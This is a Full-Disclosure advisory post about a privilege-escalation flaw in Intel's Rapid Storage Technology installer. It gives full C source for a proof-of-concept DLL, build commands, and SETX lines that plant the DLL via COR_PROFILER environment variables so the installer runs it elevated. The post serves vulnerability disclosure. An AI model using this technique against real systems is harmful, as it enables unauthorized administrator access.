lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 23 Mar 2021 19:31:53 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] CVE-2018-3635 revisited: executable installers are
	vulnerable^WEVIL (case 60): again arbitrary code execution
	WITH escalation of privilege via Intel Rapid Storage
	Technology User Interface and Driver

Hi @ll,

more than 2 years ago I disclosed 2 vulnerabilities leading to
local escalation of privilege in the
IntelĀ® Rapid Storage Technology (IntelĀ® RST) User Interface and Driver:
see <https://seclists.org/fulldisclosure/2018/Nov/45>
and <https://seclists.org/fulldisclosure/2018/Nov/52>

Intel fixed this vulnerability only in their executable installer.

Some time later Intel rewrote or rebuilt this installer (see
<https://downloadcenter.intel.com/download/29978/Intel-Rapid-Storage-Technology-Driver-Installation-Software-with-Intel-Optane-Memor
y>
for its current version 18.0.1.1138, published 10/15/2020)
and incorporated the second vulnerability.

CVSS 3.0 score: 8.2 High
CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Demonstration:
~~~~~~~~~~~~~~

0. Save the following source as sentinel.c in an arbitrary directory:

--- sentinel.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@...go.de>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE  hModule,
                               DWORD   dwReason,
                               CONTEXT *lpContext)
{
    WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

    PROCESS_INFORMATION pi;

    if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
                      CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
                      NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    return TRUE;
}
--- EOF ---

1. Start the command prompt of the 32-bit Windows Software Development Kit,
   then run the following command lines to compile sentinel.c and link it
   as sentinel.dll:

   cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c
   link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj
kernel32.lib

ALTERNATIVE for steps 0 and 1:

1. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
   and save it in an arbitrary directory.

2. Logon with the user account created during Windows setup.

3. Start a command prompt (unelevated!) and run the following command lines
   (replace <directory> with the pathname of the directory where you built
   or saved sentinel.dll):

   SETX.exe COR_ENABLE_PROFILING 1
   SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
   SETX.exe COR_PROFILER_PATH <directory>\sentinel.dll

   JFTR: this is just one method to set these environment variables without
         the need to elevate!

4. Download <https://downloadmirror.intel.com/29978/eng/SetupRST.exe> and
   save it in an arbitrary directory.

5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then
   admire the console windows showing the output of WHOAMI.exe running
   elevated.

stay tuned, and FAR AWAY from vulnerable crap built by Intel
Stefan Kanthak


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists